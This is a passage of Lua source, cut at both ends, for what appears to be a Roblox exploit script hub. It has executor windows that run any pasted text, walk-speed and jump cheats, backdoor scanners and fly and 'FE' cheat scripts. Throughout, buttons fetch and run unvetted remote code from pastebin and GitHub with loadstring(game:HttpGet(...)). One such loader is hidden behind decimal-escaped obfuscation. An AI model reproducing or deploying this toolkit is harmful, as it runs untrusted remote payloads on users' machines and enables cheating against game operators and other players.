Speed.TextXAlignment = Enum.TextXAlignment.Left speedCon.Name = "speedCon" speedCon.Parent = Seetings speedCon.BackgroundColor3 = Color3.fromRGB(0, 0, 0) speedCon.Position = UDim2.new(0.275087982, 0, 0.0397053882, 0) speedCon.Size = UDim2.new(0, 52, 0, 36) speedCon.Font = Enum.Font.SourceSans speedCon.Text = "" speedCon.TextColor3 = Color3.fromRGB(255, 255, 255) speedCon.TextSize = 14.000 speedCon.TextStrokeColor3 = Color3.fromRGB(255, 255, 255) UICorner_10.CornerRadius = UDim.new(0, 100) UICorner_10.Parent = speedCon speedset.Name = "speed set" speedset.Parent = Seetings speedset.BackgroundColor3 = Color3.fromRGB(255, 255, 255) speedset.Position = UDim2.new(0.415685654, 0, 0.030407235, 0) speedset.Size = UDim2.new(0, 49, 0, 35) speedset.Font = Enum.Font.SourceSans speedset.Text = "Set" speedset.TextColor3 = Color3.fromRGB(0, 0, 0) speedset.TextSize = 14.000 UICorner_11.CornerRadius = UDim.new(0, 100) UICorner_11.Parent = speedset JumpCon.Name = "JumpCon" JumpCon.Parent = Seetings JumpCon.BackgroundColor3 = Color3.fromRGB(0, 0, 0) JumpCon.Position = UDim2.new(0.276182711, 0, 0.294774115, 0) JumpCon.Size = UDim2.new(0, 52, 0, 36) JumpCon.Font = Enum.Font.SourceSans JumpCon.Text = "" JumpCon.TextColor3 = Color3.fromRGB(255, 255, 255) JumpCon.TextSize = 14.000 JumpCon.TextStrokeColor3 = Color3.fromRGB(255, 255, 255) UICorner_12.CornerRadius = UDim.new(0, 100) UICorner_12.Parent = JumpCon Jump.Name = "Jump" Jump.Parent = Seetings Jump.BackgroundColor3 = Color3.fromRGB(64, 148, 161) Jump.BorderColor3 = Color3.fromRGB(64, 148, 161) Jump.Position = UDim2.new(0.0107134581, 0, 0.25677219, 0) Jump.Size = UDim2.new(0, 110, 0, 50) Jump.Font = Enum.Font.SourceSans Jump.Text = "Jump" Jump.TextColor3 = Color3.fromRGB(255, 255, 255) Jump.TextSize = 50.000 Jump.TextStrokeColor3 = Color3.fromRGB(255, 255, 255) Jump.TextXAlignment = Enum.TextXAlignment.Left JumpSet.Name = "JumpSet" JumpSet.Parent = Seetings JumpSet.BackgroundColor3 = Color3.fromRGB(255, 255, 255) JumpSet.Position = UDim2.new(0.415685654, 0, 0.30069375, 0) JumpSet.Size = UDim2.new(0, 49, 0, 35) JumpSet.Font = Enum.Font.SourceSans JumpSet.Text = "Set" JumpSet.TextColor3 = Color3.fromRGB(0, 0, 0) JumpSet.TextSize = 14.000 UICorner_13.CornerRadius = UDim.new(0, 100) UICorner_13.Parent = JumpSet TextButton_5.Parent = Seetings TextButton_5.BackgroundColor3 = Color3.fromRGB(255, 255, 255) TextButton_5.Position = UDim2.new(0.0621385984, 0, 0.493272841, 0) TextButton_5.Size = UDim2.new(0, 377, 0, 50) TextButton_5.Font = Enum.Font.SourceSans TextButton_5.Text = "Credits" TextButton_5.TextColor3 = Color3.fromRGB(0, 0, 0) TextButton_5.TextSize = 14.000 UICorner_14.CornerRadius = UDim.new(0, 100) UICorner_14.Parent = TextButton_5 TextButton_6.Parent = Seetings TextButton_6.BackgroundColor3 = Color3.fromRGB(255, 255, 255) TextButton_6.Position = UDim2.new(0.0621385984, 0, 0.753894389, 0) TextButton_6.Size = UDim2.new(0, 377, 0, 50) TextButton_6.Font = Enum.Font.SourceSans TextButton_6.Text = "Discord" TextButton_6.TextColor3 = Color3.fromRGB(0, 0, 0) TextButton_6.TextSize = 14.000 UICorner_15.CornerRadius = UDim.new(0, 100) UICorner_15.Parent = TextButton_6 ImageButton.Parent = Flooded ImageButton.BackgroundColor3 = Color3.fromRGB(255, 255, 255) ImageButton.Position = UDim2.new(0.0156995207, 0, 0.186494187, 0) ImageButton.Size = UDim2.new(0, 31, 0, 30) ImageButton.Draggable = true ImageButton.Visible = false ImageButton.Image = "rbxassetid://13653511742" UICorner_16.Parent = ImageButton Search.Name = "Search" Search.Parent = topbar Search.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Search.Position = UDim2.new(0.5, 0, 0.0789473802, 0) Search.Size = UDim2.new(0.106451616, 0, 0.815789461, 0) Search.Image = "rbxassetid://13710126939" Search.ImageColor3 = Color3.fromRGB(0, 0, 0) Search.BorderSizePixel = 0 SearchFrame.Name = "SearchFrame" SearchFrame.Parent = MainFrame SearchFrame.BackgroundColor3 = Color3.fromRGB(64, 148, 161) SearchFrame.BorderColor3 = Color3.fromRGB(64, 148, 161) SearchFrame.Position = UDim2.new(0.191640079, 0, 0.161003232, 0) SearchFrame.Visible = false SearchFrame.Size = UDim2.new(0.791705072, 0, 0.809210539, 0) -- Scripts: local function MOCFHH_fake_script() -- MainFrame.LocalScript local script = Instance.new('LocalScript', MainFrame) script.Parent.Draggable = true script.Parent.Active = true end coroutine.wrap(MOCFHH_fake_script)() local function IXMRP_fake_script() -- ImageButton.LocalScript local script = Instance.new('LocalScript', ImageButton) local function QOSUZQO_fake_script() -- Flooded.LocalScript local script = Instance.new('LocalScript', MainFrame) script.Parent.Draggable = true script.Parent.Active = true end coroutine.wrap(QOSUZQO_fake_script)() end coroutine.wrap(IXMRP_fake_script)() local function HomeClick() Console_2.Visible = false ScriptHubFrame.Visible = false Executer.Visible = true Seetings.Visible = false SearchFrame.Visible = false end local function ScriptHubClick() Console_2.Visible = false ScriptHubFrame.Visible = true Executer.Visible = false Seetings.Visible = false SearchFrame.Visible = false end local function ConsoleClick() Console_2.Visible = true ScriptHubFrame.Visible = false Executer.Visible = false Seetings.Visible = false SearchFrame.Visible = false end local function SettingsClick() Console_2.Visible = false ScriptHubFrame.Visible = false Executer.Visible = false Seetings.Visible = true SearchFrame.Visible = false end local function TextButton_4Click() ImageButton.Visible = true MainFrame.Visible = false end local function ImageButtonClick() ImageButton.Visible = false MainFrame.Visible = true end -- Update the speed setting local function UpdateSpeed() local speed = tonumber(speedCon.Text) if speed then game.Players.LocalPlayer.Character.Humanoid.WalkSpeed = speed end end speedCon.FocusLost:Connect(UpdateSpeed) speedCon:GetPropertyChangedSignal("Text"):Connect(UpdateSpeed) TextButton_5.MouseButton1Click:Connect(function() game:GetService("StarterGui"):SetCore("SendNotification", { Title = "Credits:", Text = "Cm And SuperSonic, Powerd", -- Replace with your desired text Duration = 5, }) game:GetService("StarterGui"):SetCore("SendNotification", { Title = "Fixed:", Text = "fixed by Nath.#4468", -- Replace with your desired text Duration = 5, }) end) TextButton_6.MouseButton1Click:Connect(function() setclipboard("https://discord.gg/GtbFH") print("Mouse button 1 clicked on TextButton_6") end) -- Animate the beta text with a typing animation (repeated) local function AnimateBetaText() local text = "Version: Beta V2" -- The text to type local delayBetweenChars = 0.1 -- Adjust the delay between typing each character (in seconds) local delayBetweenRepeats = 1 -- Adjust the delay between each repeat (in seconds) while true do -- Hide the text initially TextLabel.TextTransparency = 1 -- Type the characters one by one for i = 1, #text do TextLabel.Text = string.sub(text, 1, i) -- Set the text up to the current character TextLabel.TextTransparency = 0 -- Show the character wait(delayBetweenChars) -- Pause between typing each character end -- Pause before the next repeat wait(delayBetweenRepeats) -- Clear the text TextLabel.Text = "" end end spawn(AnimateBetaText) JumpSet.MouseButton1Click:Connect(function() local jumpHeight = tonumber(JumpCon.Text) if jumpHeight then local character = game.Players.LocalPlayer.Character if character and character:FindFirstChild("Humanoid") then character.Humanoid.JumpPower = jumpHeight end else -- Handle invalid input here if desired end end) TextButton_3.MouseButton1Click:Connect(function() local script = ScriptInput.Text if script == "" then script = game:GetService("ClipboardService"):GetContents() end if script ~= "" then ExecuteScript(script) game.StarterGui:SetCore("SendNotification", { Title = "Script"; Text = "Script Executed"; Duration = 3; }) else print("No script to execute.") end end) Search.MouseButton1Click:Connect(function() Console_2.Visible = false ScriptHubFrame.Visible = false Executer.Visible = false Seetings.Visible = false SearchFrame.Visible = true end) Home.MouseButton1Click:Connect(HomeClick) ScriptHub.MouseButton1Click:Connect(ScriptHubClick) Console.MouseButton1Click:Connect(ConsoleClick) Settings.MouseButton1Click:Connect(SettingsClick) TextButton_4.MouseButton1Click:Connect(TextButton_4Click) ImageButton.MouseButton1Click:Connect(ImageButtonClick) TextButton_2Button.MouseButton1Click:Connect(TextButton_2Click) speedset.MouseButton1Click:Connect(setSpeed) end) Section:NewButton("Solara", "solara", function() --[[ WARNING: Heads up! This script has not been verified by ScriptBlox. Use at your own risk! ]] -- Gui to Lua -- Version: 3.2 -- Instances: local Hackerepik = Instance.new("ScreenGui") local Frame = Instance.new("Frame") local ImageLabel = Instance.new("ImageLabel") local TextBox = Instance.new("TextBox") local Execute = Instance.new("ImageButton") local CLEAR = Instance.new("ImageButton") --Properties: Hackerepik.Name = "Hacker epik" Hackerepik.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui") Hackerepik.ZIndexBehavior = Enum.ZIndexBehavior.Sibling Frame.Parent = Hackerepik Frame.BackgroundColor3 = Color3.fromRGB(0, 0, 0) Frame.BorderColor3 = Color3.fromRGB(0, 0, 0) Frame.BorderSizePixel = 0 Frame.Position = UDim2.new(0.327823907, 0, 0.302729517, 0) Frame.Size = UDim2.new(0, 481, 0, 266) ImageLabel.Parent = Frame ImageLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255) ImageLabel.BorderColor3 = Color3.fromRGB(0, 0, 0) ImageLabel.BorderSizePixel = 0 ImageLabel.Size = UDim2.new(0, 189, 0, 48) ImageLabel.Image = "http://www.roblox.com/asset/?id=18224528814" TextBox.Parent = Frame TextBox.BackgroundColor3 = Color3.fromRGB(0, 0, 0) TextBox.BorderColor3 = Color3.fromRGB(0, 0, 0) TextBox.BorderSizePixel = 0 TextBox.Position = UDim2.new(0.103950106, 0, 0.229323313, 0) TextBox.Size = UDim2.new(0, 365, 0, 154) TextBox.Font = Enum.Font.SourceSans TextBox.Text = "hi" TextBox.TextColor3 = Color3.fromRGB(255, 255, 255) TextBox.TextSize = 14.000 Execute.Name = "Execute" Execute.Parent = Frame Execute.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Execute.BorderColor3 = Color3.fromRGB(0, 0, 0) Execute.BorderSizePixel = 0 Execute.Position = UDim2.new(0, 0, 0.834586442, 0) Execute.Size = UDim2.new(0, 55, 0, 44) Execute.Image = "rbxassetid://18224532618" CLEAR.Name = "CLEAR" CLEAR.Parent = Frame CLEAR.BackgroundColor3 = Color3.fromRGB(255, 255, 255) CLEAR.BorderColor3 = Color3.fromRGB(0, 0, 0) CLEAR.BorderSizePixel = 0 CLEAR.Position = UDim2.new(0.114345111, 0, 0.857142866, 0) CLEAR.Size = UDim2.new(0, 55, 0, 38) CLEAR.Image = "rbxassetid://18224535693" -- Scripts: local function CRGSCLB_fake_script() -- Execute.LocalScript local script = Instance.new('LocalScript', Execute) local button = script.Parent local textbox = script.Parent.Parent.TextBox button.MouseButton1Click:Connect(function() loadstring(textbox.Text)() end) end coroutine.wrap(CRGSCLB_fake_script)() local function KSLNIKM_fake_script() -- CLEAR.LocalScript local script = Instance.new('LocalScript', CLEAR) local button = script.Parent local textbox = script.Parent.Parent.TextBox button.MouseButton1Click:Connect(function() textbox.Text = "" end) end coroutine.wrap(KSLNIKM_fake_script)() local function LPTAEJY_fake_script() -- Frame.LocalScript local script = Instance.new('LocalScript', Frame) script.Parent.Draggable = true script.Parent.Active = true end coroutine.wrap(LPTAEJY_fake_script)() end) Section:NewButton("Fluxus", "fluxus", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/anyahubs/executer/main/fluxus-remake.lua"))() -- Script has been shortened. end) Section:NewLabel("Backdoor Scanners") Section:NewButton("Micro Backdoor Scanner", "scan backdoored games", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/Micro-Scripts/Serverside/refs/heads/main/Micro"))() end) Section:NewButton("LALOL Hub", "scan", function() loadstring(game:HttpGet('https://raw.githubusercontent.com/Its-LALOL/LALOL-Hub/main/Backdoor-Scanner/script'))() end) Section:NewButton("King Legacy Scanner v1.1", "scan", function() loadstring(game:HttpGet('https://raw.githubusercontent.com/IvanTheProtogen/BackdoorLegacy/main/main.lua'))() end) Section:NewLabel("Fly guis") Section:NewButton("Fly Gui v1", "fly noob", function() --[[ WARNING: Heads up! This script has not been verified by ScriptBlox. Use at your own risk! ]] loadstring(game:HttpGet("https://pastebin.com/raw/y7GnniTi",true))() end) Section:NewButton("Fly Gui v2", "fly pro", function() loadstring("\108\111\97\100\115\116\114\105\110\103\40\103\97\109\101\58\72\116\116\112\71\101\116\40\40\39\104\116\116\112\115\58\47\47\103\105\115\116\46\103\105\116\104\117\98\117\115\101\114\99\111\110\116\101\110\116\46\99\111\109\47\109\101\111\122\111\110\101\89\84\47\98\102\48\51\55\100\102\102\57\102\48\97\55\48\48\49\55\51\48\52\100\100\100\54\55\102\100\99\100\51\55\48\47\114\97\119\47\101\49\52\101\55\52\102\52\50\53\98\48\54\48\100\102\53\50\51\51\52\51\99\102\51\48\98\55\56\55\48\55\52\101\98\51\99\53\100\50\47\97\114\99\101\117\115\37\50\53\50\48\120\37\50\53\50\48\102\108\121\37\50\53\50\48\50\37\50\53\50\48\111\98\102\108\117\99\97\116\111\114\39\41\44\116\114\117\101\41\41\40\41\10\10")() end) Section:NewButton("Fly Gui v3", "fly", function() --[[ WARNING: Heads up! This script has not been verified by ScriptBlox. Use at your own risk! ]] loadstring(game:HttpGet("https://raw.githubusercontent.com/XNEOFF/FlyGuiV3/main/FlyGuiV3.txt"))() end) local Tab = Window:NewTab("📣 FE Scripts") local Section = Tab:NewSection("Player FE Scripts") Section:NewButton("Sonic (Hold r To roll And Custom Jump)", "sonic", function() --[[ WARNING: Heads up! This script has not been verified by ScriptBlox. Use at your own risk! ]] --[[ WARNING: Heads up! This script has not been verified by ScriptBlox. Use at your own risk! ]] -- LocalScript in StarterPlayerScripts local Players = game:GetService("Players") local UserInputService = game:GetService("UserInputService") local player = Players.LocalPlayer local character = player.Character or player.CharacterAdded:Wait() local humanoid = character:WaitForChild("Humanoid") local humanoidRootPart = character:WaitForChild("HumanoidRootPart") local canDoubleJump = false local isDoubleJumping = false local doubleJumpPower = 50 -- Adjust this value to control the height of the double jump local rollAnimationId = "rbxassetid://18537367238" -- Animation setup local rollAnimation = Instance.new("Animation") rollAnimation.AnimationId = rollAnimationId local animator = humanoid:FindFirstChildOfClass("Animator") or humanoid:WaitForChild("Animator") local rollAnimTrack = animator:LoadAnimation(rollAnimation) rollAnimTrack.Looped = false -- Set the animation to not loop -- Function to perform the double jump local function performDoubleJump() if not canDoubleJump or isDoubleJumping then return end isDoubleJumping = true canDoubleJump = false rollAnimTrack:Play() humanoid:ChangeState(Enum.HumanoidStateType.Jumping) humanoidRootPart.Velocity = Vector3.new(humanoidRootPart.Velocity.X, doubleJumpPower, humanoidRootPart.Velocity.Z) rollAnimTrack.Stopped:Wait() isDoubleJumping = false end -- Function to handle jumping local function onJumpRequest() if humanoid:GetState() == Enum.HumanoidStateType.Freefall and canDoubleJump then performDoubleJump() elseif humanoid:GetState() == Enum.HumanoidStateType.Jumping or humanoid:GetState() == Enum.HumanoidStateType.Running then canDoubleJump = true end end -- Event listener for jump requests UserInputService.JumpRequest:Connect(onJumpRequest) -- Reset double jump when the player lands humanoid.StateChanged:Connect(function(_, newState) if newState == Enum.HumanoidStateType.Landed or newState == Enum.HumanoidStateType.Seated then canDoubleJump = false end end) --[[ WARNING: Heads up! This script has not been verified by ScriptBlox. Use at your own risk! ]] -- LocalScript in StarterPlayerScripts local Players = game:GetService("Players") local UserInputService = game:GetService("UserInputService") local RunService = game:GetService("RunService") local player = Players.LocalPlayer local character = player.Character or player.CharacterAdded:Wait() local humanoid = character:WaitForChild("Humanoid") local rolling = false local holdingRollKey = false local rollDuration = 0.5 -- Duration of each roll in seconds local rollDistance = 50 -- Distance to roll per roll action -- Animation setup local rollAnimationId = "rbxassetid://18537367238" local rollAnimation = Instance.new("Animation") rollAnimation.AnimationId = rollAnimationId local animator = humanoid:FindFirstChild("Animator") or humanoid:WaitForChild("Animator") local rollAnimTrack = animator:LoadAnimation(rollAnimation) rollAnimTrack.Looped = true -- Set the animation to loop local function stopRolling() rolling = false rollAnimTrack:Stop() end local function performRoll() local direction = character.PrimaryPart.CFrame.LookVector local startPosition = character.PrimaryPart.Position local targetPosition = startPosition + (direction * rollDistance) local rollStartTime = tick() local connection connection = RunService.RenderStepped:Connect(function() local elapsedTime = tick() - rollStartTime if elapsedTime > rollDuration then connection:Disconnect() if holdingRollKey then performRoll() else stopRolling() end return end -- Perform raycasting to check for obstacles local rayOrigin = character.PrimaryPart.Position local rayDirection = direction * rollDistance * (elapsedTime / rollDuration) local raycastParams = RaycastParams.new() raycastParams.FilterDescendantsInstances = {character} raycastParams.FilterType = Enum.RaycastFilterType.Blacklist local raycastResult = workspace:Raycast(rayOrigin, rayDirection, raycastParams) if raycastResult and raycastResult.Instance.CanCollide then -- Stop rolling if an obstacle is detected stopRolling() connection:Disconnect() return end local progress = elapsedTime / rollDuration local newPosition = startPosition:Lerp(targetPosition, progress) character:SetPrimaryPartCFrame(CFrame.new(newPosition, newPosition + direction)) end) end local function startRoll() if rolling then return end rolling = true rollAnimTrack:Play() performRoll() end UserInputService.InputBegan:Connect(function(input, gameProcessed) if gameProcessed then return end if input.KeyCode == Enum.KeyCode.R then holdingRollKey = true startRoll() end end) UserInputService.InputEnded:Connect(function(input, gameProcessed) if input.KeyCode == Enum.KeyCode.R then holdingRollKey = false end end) -- LocalScript in StarterPlayerScripts local Players = game:GetService("Players") local RunService = game:GetService("RunService") local player = Players.LocalPlayer local character = player.Character or player.CharacterAdded:Wait() local humanoid = character:WaitForChild("Humanoid") local camera = game.Workspace.CurrentCamera local defaultFOV = camera.FieldOfView local movingFOV = 120 -- Function to check if the player is moving local function isMoving() return humanoid.MoveDirection.Magnitude > 0 end -- Update the FOV based on the player's movement RunService.RenderStepped:Connect(function() if isMoving() then camera.FieldOfView = movingFOV else camera.FieldOfView = defaultFOV end end) local Players = game:GetService("Players") local LocalPlayer = Players.LocalPlayer LocalPlayer.Character:FindFirstChildOfClass("Humanoid").WalkSpeed = 60 end) Section:NewButton("John Doe", "john doe real", function() loadstring(game:HttpGet("https://gist.githubusercontent.com/MelonsStuff/83dd177230b8dff6a6e7108ec689299a/raw/2cb2e8bbd1e067df99192370842b2025ed942850/JohnDoeV1.txt"))() end) Section:NewButton("Ball Roller", "ball", function() --[[ WARNING: Heads up! This script has not been verified by ScriptBlox. Use at your own risk! ]] --🟦DISCORD🟦: https://discord.gg/4sA3JQj5AK loadstring(game:HttpGet("https://pastebin.com/raw/BZr9bGDy", true))() --🟦DISCORD🟦: https://discord.gg/4sA3JQj5AK -- Youtube: https://www.youtube.com/channel/UCr_uZrXrbk9dfWoLXgOLO1g -- Roblox profile: https://www.roblox.com/users/2399670479/profile end) Section:NewButton("Parkour (keybinds: G,F,N)", "r6", function() loadstring(game:HttpGet("https://pastebin.com/raw/WW932Ykj"))() end) Section:NewButton("Disabled Tools", "tools", function() loadstring(game:HttpGet("https://pastebin.com/raw/AZVi2tuK"))() end) Section:NewButton("Chill", "chill", function() --[[ WARNING: Heads up! This script has not been verified by ScriptBlox. Use at your own risk! ]] game:GetService("StarterGui"):SetCore("SendNotification", { Title = "Melon's (FE) Scripts"; Text = "Loading, enjoy!"; Icon = "rbxthumb://type=Asset&id=7969699183&w=150&h=150"}) Duration = 16; wait(0) HumanDied = false local CountSCIFIMOVIELOL = 1 function SCIFIMOVIELOL(Part0,Part1,Position,Angle) local AlignPos = Instance.new('AlignPosition', Part1); AlignPos.Name = "AliP_"..CountSCIFIMOVIELOL AlignPos.ApplyAtCenterOfMass = true; AlignPos.MaxForce = 5772000--67752; AlignPos.MaxVelocity = math.huge/9e110; AlignPos.ReactionForceEnabled = false; AlignPos.Responsiveness = 200; AlignPos.RigidityEnabled = false; local AlignOri = Instance.new('AlignOrientation', Part1); AlignOri.Name = "AliO_"..CountSCIFIMOVIELOL AlignOri.MaxAngularVelocity = math.huge/9e110; AlignOri.MaxTorque = 5772000 AlignOri.PrimaryAxisOnly = false; AlignOri.ReactionTorqueEnabled = false; AlignOri.Responsiveness = 200; AlignOri.RigidityEnabled = false; local AttachmentA=Instance.new('Attachment',Part1); AttachmentA.Name = "Ath_"..CountSCIFIMOVIELOL local AttachmentB=Instance.new('Attachment',Part0); AttachmentB.Name = "Ath_"..CountSCIFIMOVIELOL AttachmentA.Orientation = Angle or Vector3.new(0,0,0) AttachmentA.Position = Position or Vector3.new(0,0,0) AlignPos.Attachment1 = AttachmentA; AlignPos.Attachment0 = AttachmentB; AlignOri.Attachment1 = AttachmentA; AlignOri.Attachment0 = AttachmentB; CountSCIFIMOVIELOL = CountSCIFIMOVIELOL + 1 return {AlignPos,AlignOri,AttachmentA,AttachmentB} end game:FindFirstChildOfClass("Players").LocalPlayer["Character"].Archivable = true local hatnameclone = {} for _,v in next, game:FindFirstChildOfClass("Players").LocalPlayer["Character"]:GetChildren() do if v:IsA("Accessory") then if hatnameclone[v.Name] then if hatnameclone[v.Name] == "s" then hatnameclone[v.Name] = {} end table.insert(hatnameclone[v.Name],v) else hatnameclone[v.Name] = "s" end end end for _,v in pairs(hatnameclone) do if type(v) == "table" then local num = 1 for _,w in pairs(v) do w.Name = w.Name..num num = num + 1 end end end hatnameclone = nil local DeadChar = game:FindFirstChildOfClass("Players").LocalPlayer.Character local fldr = Instance.new("Folder",game:FindFirstChildOfClass("Players").LocalPlayer["Character"]) fldr.Name = "DMYF" local CloneChar = DeadChar:Clone() local ANIMATIONHERE if CloneChar:FindFirstChild("Animate") then ANIMATIONHERE = CloneChar:FindFirstChild("Animate"):Clone() CloneChar:FindFirstChild("Animate"):Destroy() end if CloneChar:FindFirstChildOfClass("Folder") then CloneChar:FindFirstChildOfClass("Folder"):Destroy() end if CloneChar.Torso:FindFirstChild("Neck") then local Clonessss = CloneChar.Torso:FindFirstChild("Neck"):Clone() Clonessss.Part0 = nil Clonessss.Part1 = DeadChar.Head Clonessss.Parent = DeadChar.Torso end CloneChar.Parent = fldr CloneChar.HumanoidRootPart.CFrame = DeadChar.HumanoidRootPart.CFrame CloneChar.Humanoid.BreakJointsOnDeath = false CloneChar.Name = "non" CloneChar.Humanoid.DisplayDistanceType = "None" for _,v in next, DeadChar:GetChildren() do if v:IsA("Accessory") then local topacc = false if v.Handle:FindFirstChildOfClass("Weld") then v.Handle:FindFirstChildOfClass("Weld"):Destroy() end v.Handle.Massless = true v.Handle.CanCollide = false if v.Handle:FindFirstChildOfClass("Attachment") then local ath__ = v.Handle:FindFirstChildOfClass("Attachment") if ath__.Name == "HatAttachment" or ath__.Name == "HairAttachment" or ath__.Name == "FaceFrontAttachment" or ath__.Name == "FaceCenterAttachment" then topacc = ath__.Name end end local bv = Instance.new("BodyVelocity",v.Handle) bv.Velocity = Vector3.new(0,0,0) coroutine.wrap(function() if topacc then local allthings = SCIFIMOVIELOL(v.Handle,DeadChar.Torso,Vector3.new(0,1.5,0)+ (DeadChar.Head[topacc].Position + (v.Handle[topacc].Position*-1)),Vector3.new(0,0,0)) local normaltop = allthings[1].Attachment1 local alipos = allthings[1] local alirot = allthings[2] local p0 = v.Handle local p1 = DeadChar.Head alipos.Parent = CloneChar:FindFirstChild(v.Name).Handle alirot.Parent = CloneChar:FindFirstChild(v.Name).Handle while true do game:GetService("RunService").RenderStepped:wait() if HumanDied then break end coroutine.wrap(function() if alipos.Attachment1 == normaltop then p0.CFrame = p0.CFrame:lerp((((DeadChar.Torso.CFrame * CFrame.new(0,1.5,0)) * p1[topacc].CFrame) * p0[topacc].CFrame:inverse()),1) else v.Handle.CFrame = v.Handle.CFrame:lerp(alipos.Attachment1.Parent.CFrame * CFrame.new(alipos.Attachment1.Position) * CFrame.Angles(math.rad(alipos.Attachment1.Rotation.X),math.rad(alipos.Attachment1.Rotation.Y),math.rad(alipos.Attachment1.Rotation.Z)),1) end end)() end else SCIFIMOVIELOL(v.Handle,CloneChar[v.Name].Handle,Vector3.new(0,0,0),Vector3.new(0,0,0)) end end)() end end local a = DeadChar.Torso local b = DeadChar.HumanoidRootPart local c = DeadChar.Humanoid a.Parent = game:FindFirstChildOfClass("Workspace") c.Parent = game:FindFirstChildOfClass("Workspace") local told = a:Clone() local told1 = c:Clone() b["RootJoint"].Part0 = told b["RootJoint"].Part1 = DeadChar.Head a.Name = "torso" a.Neck:Destroy() c.Name = "Mizt Hub Best" told.Parent = DeadChar told1.Parent = DeadChar DeadChar.PrimaryPart = told told1.Health = 0 b:Destroy() a.Parent = DeadChar c.Parent = DeadChar told:Destroy() told1:Destroy() a.Name = "Torso" if CloneChar.Head:FindFirstChildOfClass("Decal") then CloneChar.Head:FindFirstChildOfClass("Decal").Transparency = 1 end if DeadChar:FindFirstChild("Animate") then DeadChar:FindFirstChild("Animate"):Destroy() end local Collider function UnCollide() if HumanDied then Collider:Disconnect(); return end --[[for _,Parts in next, CloneChar:GetChildren() do if Parts:IsA("BasePart") then Parts.CanCollide = false end end]] for _,Parts in next, DeadChar:GetChildren() do if Parts:IsA("BasePart") then Parts.CanCollide = false end end end Collider = game:GetService("RunService").Stepped:Connect(UnCollide) local resetBindable = Instance.new("BindableEvent") resetBindable.Event:connect(function() game:GetService("StarterGui"):SetCore("ResetButtonCallback", true) resetBindable:Destroy() HumanDied = true pcall(function() game:FindFirstChildOfClass("Players").LocalPlayer.Character = DeadChar DeadChar.Head:Destroy() DeadChar:FindFirstChildOfClass("Humanoid"):Destroy() game:FindFirstChildOfClass("Players").LocalPlayer.Character = CloneChar if DeadChar:FindFirstChildOfClass("Folder") then DeadChar:FindFirstChildOfClass("Folder"):Destroy() end end) end) game:GetService("StarterGui"):SetCore("ResetButtonCallback", resetBindable) coroutine.wrap(function() while true do game:GetService("RunService").RenderStepped:wait() if not CloneChar or not CloneChar:FindFirstChild("Head") or not CloneChar:FindFirstChildOfClass("Humanoid") or CloneChar:FindFirstChildOfClass("Humanoid").Health <= 0 and not DeadChar or not DeadChar:FindFirstChild("Head") or not DeadChar:FindFirstChildOfClass("Humanoid") or DeadChar:FindFirstChildOfClass("Humanoid").Health <= 0 then HumanDied = true pcall(function() game:FindFirstChildOfClass("Players").LocalPlayer.Character = DeadChar DeadChar.Head:Destroy() DeadChar:FindFirstChildOfClass("Humanoid"):Destroy() game:FindFirstChildOfClass("Players").LocalPlayer.Character = CloneChar if DeadChar:FindFirstChildOfClass("Folder") then DeadChar:FindFirstChildOfClass("Folder"):Destroy() end end) if resetBindable then game:GetService("StarterGui"):SetCore("ResetButtonCallback", true) resetBindable:Destroy() end break end end end)() SCIFIMOVIELOL(DeadChar["Head"],CloneChar["Head"]) SCIFIMOVIELOL(DeadChar["Torso"],CloneChar["Torso"]) SCIFIMOVIELOL(DeadChar["Left Arm"],CloneChar["Left Arm"]) SCIFIMOVIELOL(DeadChar["Right Arm"],CloneChar["Right Arm"]) SCIFIMOVIELOL(DeadChar["Left Leg"],CloneChar["Left Leg"]) SCIFIMOVIELOL(DeadChar["Right Leg"],CloneChar["Right Leg"]) for _,v in pairs(DeadChar:GetChildren()) do if v:IsA("BasePart") and v.Name ~= "Head" then --[[local bv = Instance.new("BodyVelocity",v) bv.Velocity = Vector3.new(0,0,0) coroutine.wrap(function() while true do game:GetService("RunService").RenderStepped:wait() if HumanDied then break end v.CFrame = CloneChar[v.Name].CFrame end end)()]] elseif v:IsA("BasePart") and v.Name == "Head" then local bv = Instance.new("BodyVelocity",v) bv.Velocity = Vector3.new(0,0,0) coroutine.wrap(function() while true do game:GetService("RunService").RenderStepped:wait() if HumanDied then break end v.CFrame = DeadChar.Torso.CFrame * CFrame.new(0,1.5,0) end end)() end end for _,BodyParts in next, CloneChar:GetDescendants() do if BodyParts:IsA("BasePart") or BodyParts:IsA("Part") then BodyParts.Transparency = 1 end end game:GetService("RunService").RenderStepped:wait() game:FindFirstChildOfClass("Players").LocalPlayer.Character = CloneChar game:FindFirstChildOfClass("Workspace"):FindFirstChildOfClass("Camera").CameraSubject = CloneChar.Humanoid for _,v in next, DeadChar:GetChildren() do if v:IsA("Accessory") then if v.Handle:FindFirstChildOfClass("Weld") then v.Handle:FindFirstChildOfClass("Weld"):Destroy() end end end if ANIMATIONHERE then ANIMATIONHERE.Parent = CloneChar end wait(0) m = game.Players.LocalPlayer char = m.Character function Random(num) local section=num % 1 * 3; local secondary=0.5 * math.pi * (section % 1); if section < 1 then return 1,1 - math.cos(secondary),1 - math.sin(secondary); elseif section < 2 then return 1 - math.sin(secondary),1,1 - math.cos(secondary); else return 1 - math.cos(secondary),1 - math.sin(secondary),1; end end --//Lol try to figure this one out// function rainb(hue) local section = hue % 1 * 3 local secondary = 0.5 * math.pi * (section % 1) if section < 1 then return Color3.new(1, 1 - math.cos(secondary), 1 - math.sin(secondary)) elseif section < 2 then return Color3.new(1 - math.sin(secondary), 1, 1 - math.cos(secondary)) else return Color3.new(1 - math.cos(secondary), 1 - math.sin(secondary), 1) end end Chillmusic = Instance.new("Sound", workspace) Chillmusic.Parent = game.Chat Chillmusic.Volume = 8 Chillmusic.SoundId = "rbxassetid://1221694420" Chillmusic.Looped = true Chillmusic:Play() local txt = Instance.new("BillboardGui", char) txt.Adornee = char.Head txt.Name = "_status" txt.Size = UDim2.new(2, 0, 1.2, 0) txt.StudsOffset = Vector3.new(-9, 8, 0) local text = Instance.new("TextLabel", txt) text.Size = UDim2.new(10, 0, 7, 0) text.FontSize = "Size24" text.TextScaled = true text.TextTransparency = 0 text.BackgroundTransparency = 1 text.TextTransparency = 0 text.TextStrokeTransparency = 0 text.Font = "Arcade" text.TextStrokeColor3 = Color3.new(0, 0, 0) v = Instance.new("Part") v.Name = "ColorBrick" v.Parent = m.Character v.FormFactor = 